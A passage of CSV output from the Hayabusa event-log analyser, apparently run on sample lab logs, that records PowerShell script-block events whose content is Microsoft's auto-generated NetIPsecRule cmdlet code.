[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecRule' -Alias '*' function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.080 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"t')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 
'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecRule' -Alias '*' function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( 
[Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.080 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetIPsecRule' -Alias '*' function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] [string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, [Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name 
= 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) 